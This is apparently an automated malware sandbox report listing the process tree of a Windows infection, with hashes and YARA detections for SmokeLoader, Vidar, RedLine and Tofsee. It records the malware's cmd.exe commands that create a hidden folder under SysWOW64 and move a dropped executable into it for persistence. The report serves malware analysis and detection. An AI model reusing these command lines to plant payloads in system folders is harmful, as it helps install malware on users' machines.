                                                                                                            File size:3933184 bytes
                                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 6956 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:24
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 672 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:39
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: iscgwer PID: 6784 Parent PID: 664

                                                                                                            General

                                                                                                            Start time:13:58:53
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                            Analysis Process: iscgwer PID: 6780 Parent PID: 6784

                                                                                                            General

                                                                                                            Start time:13:58:55
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.395898272.00000000004D1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.395779805.0000000000460000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                            Analysis Process: svchost.exe PID: 6756 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:56
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: 411E.exe PID: 4256 Parent PID: 3352

                                                                                                            General

                                                                                                            Start time:13:59:00
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\411E.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\411E.exe
                                                                                                            Imagebase:0x400000
                                                                                                            File size:301056 bytes
                                                                                                            MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 46%, Metadefender, Browse
                                                                                                            • Detection: 77%, ReversingLabs

                                                                                                            Analysis Process: 53DC.exe PID: 1740 Parent PID: 3352

                                                                                                            General

                                                                                                            Start time:13:59:04
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\53DC.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\53DC.exe
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 47%, ReversingLabs

                                                                                                            Analysis Process: 53DC.exe PID: 6976 Parent PID: 1740

                                                                                                            General

                                                                                                            Start time:13:59:07
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\53DC.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\53DC.exe
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.420944310.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.420623827.0000000000430000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                            Analysis Process: WerFault.exe PID: 6752 Parent PID: 4256

                                                                                                            General

                                                                                                            Start time:13:59:07
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 520
                                                                                                            Imagebase:0x150000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: E6C4.exe PID: 6924 Parent PID: 3352

                                                                                                            General

                                                                                                            Start time:13:59:08
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\E6C4.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\E6C4.exe
                                                                                                            Imagebase:0x400000
                                                                                                            File size:322560 bytes
                                                                                                            MD5 hash:C94FBEF580C7CD0BA874360D0B997F22
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                            Analysis Process: F4CF.exe PID: 6380 Parent PID: 3352

                                                                                                            General

                                                                                                            Start time:13:59:11
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\F4CF.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\F4CF.exe
                                                                                                            Imagebase:0x400000
                                                                                                            File size:319488 bytes
                                                                                                            MD5 hash:50BADD524B2E3FAF0FF050DD5BE8A584
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000003.413183404.0000000000780000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000002.458185502.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                            Analysis Process: FD6B.exe PID: 6972 Parent PID: 3352

                                                                                                            General

                                                                                                            Start time:13:59:14
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\FD6B.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\FD6B.exe
                                                                                                            Imagebase:0xcf0000
                                                                                                            File size:537088 bytes
                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                            Analysis Process: MpCmdRun.exe PID: 5224 Parent PID: 5020

                                                                                                            General

                                                                                                            Start time:13:59:16
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                            Imagebase:0x7ff6b8fe0000
                                                                                                            File size:455656 bytes
                                                                                                            MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: svchost.exe PID: 4848 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:59:16
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: conhost.exe PID: 5320 Parent PID: 5224

                                                                                                            General

                                                                                                            Start time:13:59:17
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7f20f0000
                                                                                                            File size:625664 bytes
                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: wuapihost.exe PID: 6700 Parent PID: 744

                                                                                                            General

                                                                                                            Start time:13:59:18
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\wuapihost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\wuapihost.exe -Embedding
                                                                                                            Imagebase:0x7ff7d3830000
                                                                                                            File size:10752 bytes
                                                                                                            MD5 hash:85C9C161B102A164EC09A23CACDDD09E
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: cmd.exe PID: 6228 Parent PID: 6380

                                                                                                            General

                                                                                                            Start time:13:59:24
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\jdijwvkg\
                                                                                                            Imagebase:0xd80000
                                                                                                            File size:232960 bytes
                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: conhost.exe PID: 6344 Parent PID: 6228

                                                                                                            General

                                                                                                            Start time:13:59:24
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7f20f0000
                                                                                                            File size:625664 bytes
                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: cmd.exe PID: 5092 Parent PID: 6380

                                                                                                            General

                                                                                                            Start time:13:59:27
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\
                                                                                                            Imagebase:0xd80000
                                                                                                            File size:232960 bytes
                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: FD6B.exe PID: 5976 Parent PID: 6972

                                                                                                            General

                                                                                                            Start time:13:59:28
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\FD6B.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\FD6B.exe
                                                                                                            Imagebase:0x1a0000
                                                                                                            File size:537088 bytes
                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: conhost.exe PID: 3932 Parent PID: 5092

                                                                                                            General

                                                                                                            Start time:13:59:28
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7f20f0000
                                                                                                            File size:625664 bytes
                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Disassembly

                                                                                                            Code Analysis

                                                                                                            Reset < >